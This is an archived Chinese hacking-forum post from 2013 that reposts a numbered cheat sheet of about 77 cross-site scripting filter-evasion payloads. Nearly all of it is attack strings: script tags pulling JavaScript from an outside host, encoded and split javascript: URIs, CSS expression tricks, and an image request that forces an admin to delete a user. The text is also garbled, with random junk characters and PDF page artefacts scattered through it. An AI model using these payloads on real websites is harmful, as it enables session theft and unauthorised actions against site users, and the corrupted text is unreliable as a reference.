找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2867|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 u" q' s* C- _+ K- [! M. E, ~(1)普通的XSS JavaScript注入
# F- T. F0 C2 S4 n. ~$ a<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) Z" D1 d+ f' Y( G6 H
(2)IMG标签XSS使用JavaScript命令
5 g  i3 E2 K4 H7 D4 \" Z( R0 l<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' D- Q* Y- m* u" h3 j, ^* s" D6 K(3)IMG标签无分号无引号1 C; c6 j1 E: S
<IMG SRC=javascript:alert(‘XSS’)>
  P& v% F: c! J( v0 E; Q1 @(4)IMG标签大小写不敏感
* z7 E2 ^& `2 v6 l# q% n) Z<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 H& V, N) y3 I; m9 i" @(5)HTML编码(必须有分号)1 w0 w* H( b0 t* Y3 ?4 p$ j" x% J
<IMG SRC=javascript:alert(“XSS”)>
# U  u+ P1 R/ d4 o7 C9 T4 }; }(6)修正缺陷IMG标签
( d& m$ c  c3 P$ B<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>& {9 g2 Y+ e/ @3 n
$ H5 j$ a- m/ V+ H1 `

+ |3 w8 U* t" Q(7)formCharCode标签(计算器)
& x, [% H; M: C' M" s% O3 ?) h<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! I1 Q: a: e. W9 b  o. J' d# q(8)UTF-8的Unicode编码(计算器)% x& V5 C& y- H
<IMG SRC=jav..省略..S')>
* r& Y- H7 ]0 b! X; ~/ B(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: B; V- h: {/ v3 m/ B; ~<IMG SRC=jav..省略..S')>
$ L! Z( S0 t1 l7 v9 d. k(10)十六进制编码也是没有分号(计算器)0 Z+ [7 w5 L2 j8 s1 W
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>6 v; a5 \! i/ x( C( G0 v5 ^5 T
(11)嵌入式标签,将Javascript分开
; ^2 t  p4 m! M3 r& h9 J, ?<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 Y, C+ j* P7 e1 i. S) a  a(12)嵌入式编码标签,将Javascript分开
  ]; v, z, l) `0 I- t: Y" A<IMG SRC=”jav ascript:alert(‘XSS’);”>5 _4 t+ U1 T( P/ x1 e( q! P$ e+ @- {! w4 y# C
(13)嵌入式换行符0 y- D0 m7 o/ }1 W) P5 A- S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 n8 W- G4 O" \0 I(14)嵌入式回车7 y9 ?+ v1 C$ [  S1 ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% o' f# ~: O8 _# {& n% t# }) e(15)嵌入式多行注入JavaScript,这是XSS极端的例子8 K8 X$ s! {0 g
<IMG SRC=”javascript:alert(‘XSS‘)”>
  S2 ^1 T9 q4 z$ M! Q; B, p(16)解决限制字符(要求同页面)' a1 ^1 O# Q" v* z- f- O& r
<script>z=’document.’</script>
/ n2 P/ v2 X* k: H<script>z=z+’write(“‘</script>. M5 O' C1 j+ ^, S8 z
<script>z=z+’<script’</script>4 O$ B  x4 s/ F6 x' D/ m* Z
<script>z=z+’ src=ht’</script>
& _& {9 p  l4 i, M' R<script>z=z+’tp://ww’</script>
; t, g8 t: L7 q. q<script>z=z+’w.shell’</script>
5 X( @" \* w. T1 v  ^, q<script>z=z+’.net/1.’</script>! l0 ~* K# F# I+ w( t' ?. {( ]
<script>z=z+’js></sc’</script>
' R8 {6 w% E) u9 ?<script>z=z+’ript>”)’</script>
1 N. P1 `6 G1 ?' L, J+ Q<script>eval_r(z)</script>6 C( H5 K8 M6 F: X
(17)空字符12-7-1 T00LS - Powered by Discuz! Board8 I1 F% S  B4 S, J9 I2 T9 W
https://www.t00ls.net/viewthread ... table&tid=15267 2/6: ]: h& q. W# `" A8 V: ?
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) b$ a* ?  r/ Y+ Z) z" T
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 s2 U/ n2 S3 [$ F, o' Wperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% O2 q  ?, {3 M(19)Spaces和meta前的IMG标签( t1 v$ `' A0 Y% |6 n) Y+ }
<IMG SRC=” javascript:alert(‘XSS’);”>" W" L9 h! W$ E* s8 r
(20)Non-alpha-non-digit XSS0 o# d$ i4 s* ^7 V+ I
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* T" U4 }2 ^8 ~5 t(21)Non-alpha-non-digit XSS to 2
* E) Z- o* N6 [+ Z3 \  B0 t<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 M5 I5 Z9 j$ m% J(22)Non-alpha-non-digit XSS to 3
. O* e( C) z; `, n- G<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) B% z# {3 O7 K(23)双开括号  w; u& f, j9 q: `: ?* A: g
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
' @) R+ I% f7 c4 N2 q4 {. I5 V6 P(24)无结束脚本标记(仅火狐等浏览器)$ l' y) i) u- W7 a; \4 A/ G1 z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>+ O. F. f$ `, N/ }+ v
(25)无结束脚本标记2
! J% N- O" l; B, Q/ W5 o<SCRIPT SRC=//3w.org/XSS/xss.js>
0 g2 _! y* [( l4 i* [% v(26)半开的HTML/JavaScript XSS
) `$ w4 y5 b; k% e' e& j) z<IMG SRC=”javascript:alert(‘XSS’)”3 i( y8 G9 A" [; l
(27)双开角括号
4 n- @3 [) ], A# z* J. l<iframe src=http://3w.org/XSS.html <$ r( X& n. w: W8 B: b' n; I
(28)无单引号 双引号 分号
! f6 h1 \- X2 [; Z7 s<SCRIPT>a=/XSS/' Z* u+ h) v+ z, o2 F
alert(a.source)</SCRIPT>
5 ?: E0 @7 w" K5 O7 {" T1 r(29)换码过滤的JavaScript
& W: a3 S# }- M) q$ A0 Z( [\”;alert(‘XSS’);//3 D1 s, P( N6 b
(30)结束Title标签2 W7 G3 k0 M  K
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT># c8 [. W7 m' `; l  _( _. H
(31)Input Image- w5 h7 Q/ a4 \! \
<INPUT SRC=”javascript:alert(‘XSS’);”>
  D4 t  z4 g: a/ d+ a. v(32)BODY Image: _1 {$ o, }& }1 `+ p+ |& d2 |$ G( d
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>& u9 @& ~5 A, d; t
(33)BODY标签; Z& |5 D' o  r( U8 J8 f
<BODY(‘XSS’)>
! R; o& E' a. x(34)IMG Dynsrc0 u8 v2 K+ L$ Y' U
<IMG DYNSRC=”javascript:alert(‘XSS’)”>7 M0 `9 R3 g" J) G  S
(35)IMG Lowsrc7 I( q. W, X% \! s% M5 F2 }
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
& K2 m( Z7 i( |(36)BGSOUND. Q3 H: n/ D5 f; o
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( F( l9 i- y- O$ G0 p(37)STYLE sheet; l( W8 V- s8 _  h) h3 {* d: B
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 [+ F' P6 K! `/ w
(38)远程样式表- f( p6 T. }  K# H4 b6 P2 [
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>& J- h6 A7 z2 O3 Z
(39)List-style-image(列表式)
3 _2 ?* z" t; P* Y' [<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# r9 K5 f1 P" ?(40)IMG VBscript  Q$ @+ L# u' G: g, @. U8 e
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! o; }& B& N: k(41)META链接url3 L3 Z. i4 B& g9 K( b5 L$ L
% k' ^! O6 C5 ?4 i) D
6 h' A+ [$ c, `& m3 d8 ~- A
<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ N! j" |7 d9 B# R; m' B3 u; u3 x6 [URL=http://;URL=javascript:alert(‘XSS’);”>, s. y/ s% Z% q1 e5 d8 e
(42)Iframe
0 j) C, W8 `( N& i0 J7 y<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>* B4 K, N  U4 G% A# I; f
(43)Frame
# M. L# ~' z- P5 c6 N<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
0 C; ?7 n6 j5 t/ E( a5 j) C+ [7 Chttps://www.t00ls.net/viewthread ... table&tid=15267 3/6" I+ A: H1 I& z* g, i
(44)Table) V, M; |+ J; q( V5 f
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) {; O, S4 Q* z; I0 Q% _
(45)TD
0 \% T9 {6 F' @) @% T& i$ Y( I% v; ?<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' c; @! u% A4 Z& p1 U(46)DIV background-image
$ E) f" X" F! o6 }<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' Z/ \) b# n( L4 S' F
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
) e  d; Z" O  }) p( Q* R0 ]( }; Y6 b8&13&12288&65279)7 z4 ~9 z! ?2 [
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- j( l0 \9 F& r9 u4 Q) l6 U
(48)DIV expression
6 B' f0 M; n' |; ~! _3 C+ M<DIV STYLE=”width: expression_r(alert(‘XSS’));”>9 N8 v! n$ a. d( p6 r* N& ?
(49)STYLE属性分拆表达
( n$ u7 ?# x. K5 B<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 O8 A6 r! v/ h/ S0 ?; e7 t
(50)匿名STYLE(组成:开角号和一个字母开头)
; k5 @. N% q, f0 i<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. x1 B/ O5 ]3 t* a2 |& j8 f$ J(51)STYLE background-image) U, }! {7 |1 d5 W5 V* y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A2 s; ]6 g9 X. U! h7 @$ G2 F* \
CLASS=XSS></A>
5 }. l/ }' q5 B  g(52)IMG STYLE方式
$ o+ z9 @- F! }( y+ W, M' w! M! ?exppression(alert(“XSS”))’>
( e- a# b. y* O$ E6 b& ?(53)STYLE background
9 d9 h' k. y4 K1 z- P. F* e<STYLE><STYLE
# O7 |2 e- x" D2 Y  q, u9 xtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% h$ ~/ ^  t+ z+ ]( O/ Q(54)BASE5 F$ t( E5 v# n# I; C7 A
<BASE HREF=”javascript:alert(‘XSS’);//”>
+ g# s2 [1 l$ \/ }3 @% ?" e6 G, F+ [(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* p( ~4 ]$ w' S* [
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
% i$ ]* |: [! t0 f(56)在flash中使用ActionScrpt可以混进你XSS的代码. e' S7 C5 f6 G4 B# @; E5 J
a=”get”;
9 v" _% m+ S* W+ Fb=”URL(\”";9 f7 ?2 r- i5 m8 U
c=”javascript:”;# {3 }+ \$ e4 s. [/ i  v* e' }
d=”alert(‘XSS’);\”)”;" u; S5 e/ x' {; j8 i5 j/ s
eval_r(a+b+c+d);
, y( b5 o' a6 f* ^(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上" @9 v; G" J( N8 i8 V6 Q
<HTML xmlns:xss>
5 f1 T# u* f6 Z: K! T<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' H/ W* T  _, D6 b9 L" J8 H" M
<xss:xss>XSS</xss:xss>
" G9 r# t0 e- e4 P* [$ U/ \</HTML>
) x9 Y2 ?+ f; }) \& G(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
4 N, \) J+ J/ r<SCRIPT SRC=””></SCRIPT>
8 B3 V/ G4 ~6 d/ z, G6 j3 n/ f(59)IMG嵌入式命令,可执行任意命令
+ {  c7 [/ e% `, Q: L<IMG SRC=”http://www.XXX.com/a.php?a=b”>
5 J$ r* T. C3 j(60)IMG嵌入式命令(a.jpg在同服务器)9 d) Q5 x3 V3 p/ @0 `
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
" |+ f" r) ~% N(61)绕符号过滤. M. |- T4 M3 T' r  v3 c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>  \# k- m, p( _6 k; ~
(62)
3 b" j6 [2 k# x! w<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>' a  t/ A/ A/ M; B( P- l
(63)
! {& \" B* l2 g# @<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- L7 v: M& i$ r! @$ X
(64)+ G' @) ~7 k8 \4 E1 h8 u* j
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 i# A# Q: q3 A6 C9 R/ l7 e/ ](65)+ p, H2 ?/ `; q' a
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>: E8 L* I& @9 c; w7 G: x- ~" f7 ~
(66)12-7-1 T00LS - Powered by Discuz! Board
" F, j$ z) A. W/ ]3 b; ]6 O' \" C0 uhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
) U0 y* ^! l7 j<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>5 G5 u5 D4 }( g
(67)
2 R8 g* x# S1 V  P<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
5 g7 m! E; O, g( b</SCRIPT>2 @$ J# z* {. W" }& b1 s
(68)URL绕行
! v4 I: y, N$ f. s<A HREF=”http://127.0.0.1/”>XSS</A>0 v& P; v, b# ]( j5 J
(69)URL编码% k6 s& H' F7 @+ U, ?
<A HREF=”http://3w.org”>XSS</A>* n# y( A, B9 }" a$ p
(70)IP十进制1 Y$ ]8 R# Q6 H' g# a# Q# z4 t
<A HREF=”http://3232235521″>XSS</A>0 C3 Y" |- i( E+ B
(71)IP十六进制
4 ]3 b/ y: @$ O7 q1 a& p, F* ?<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 j& u/ g2 N3 a4 E! M(72)IP八进制
( |" t8 B' m8 @$ [! p( z- _' ^<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 o) G% y6 _5 _0 _) {8 P  m(73)混合编码
3 G# V1 \0 b7 M<A HREF=”h+ _  y+ z2 ~  X) z' T) r( J
tt p://6 6.000146.0×7.147/”">XSS</A>2 u4 |- h8 W- ^/ U# B& t% o
(74)节省[http:]
$ M9 O6 z& Y# M<A HREF=”//www.google.com/”>XSS</A>
/ L+ I" O5 |3 R0 i( _(75)节省[www]' u) I9 _3 H* X0 A
<A HREF=”http://google.com/”>XSS</A>7 O3 s( z8 ~7 I* E1 O9 X9 R
(76)绝对点绝对DNS2 g" H( \  _6 b6 d
<A HREF=”http://www.google.com./”>XSS</A>
! o2 [) ]+ R) ^1 \0 ]0 `; m(77)javascript链接' U4 v  G1 A, \: ?, S" }
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
& B! S+ g% [) j) i$ p' L
/ P9 {& a& v0 p原文地址:http://fuzzexp.org/u/0day/?p=14
  @. h% n1 a! J0 e# }2 g
- r, U- i( @$ E) p2 I; r6 S2 L# z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表